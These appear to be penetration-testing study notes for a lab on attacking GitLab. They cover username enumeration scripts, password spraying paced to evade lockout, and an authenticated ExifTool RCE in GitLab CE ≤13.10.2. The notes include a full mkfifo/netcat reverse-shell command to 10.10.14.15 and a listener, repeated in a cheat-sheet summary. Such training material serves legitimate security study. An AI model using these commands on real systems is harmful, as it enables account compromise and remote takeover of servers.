16.-Attacking-gitlab

1. Username Enumeration

Manual Enumeration

• Attempt to register accounts with various usernames. GitLab will indicate if a username is already taken, confirming its existence.

Automated Enumeration

• Use the gitlab_userenum.sh script or its Python3 equivalent to automate the process.

Command Examples

# Bash script version
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Python script version
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

Password Spraying

• After enumerating usernames, perform password spraying with common passwords or credentials from data breaches.

• GitLab’s default account lockout policy:

  • 10 failed attempts trigger a 10-minute lockout.

  • Avoid brute-force detection by using slow, distributed attacks.

---

2. Authenticated Remote Code Execution (RCE)

Vulnerability Details

• GitLab Community Edition ≤13.10.2 is vulnerable to RCE due to improper handling of ExifTool metadata.

Exploitation Steps

1. Use the gitlab_13_10_2_rce.py exploit script.

2. Execute the following command to gain a reverse shell:

Command Example

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

Setting Up a Netcat Listener

• Start a Netcat listener to receive the reverse shell connection.

Command Example

nc -lnvp 8443

---

Key Takeaways

Username Enumeration

• Helps identify valid accounts for potential password spraying.

• GitLab’s lockout settings must be factored into attack methodology.

RCE Exploitation

• The ExifTool vulnerability allows remote code execution with valid credentials.

• If self-registration is enabled, attackers can create an account for exploitation.

Reverse Shell Considerations

• The RCE exploit initiates a reverse shell to establish persistent access.

Ethical Considerations

• Only conduct testing on authorized systems.

• Replace placeholders (IP addresses, ports, credentials) with real values as needed.

---

Summary of Commands

# Username Enumeration (gitlab_userenum.sh)
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Username Enumeration (gitlab_userenum.py)
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

# Authenticated RCE (gitlab_13_10_2_rce.py)
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

# Netcat Listener
nc -lnvp 8443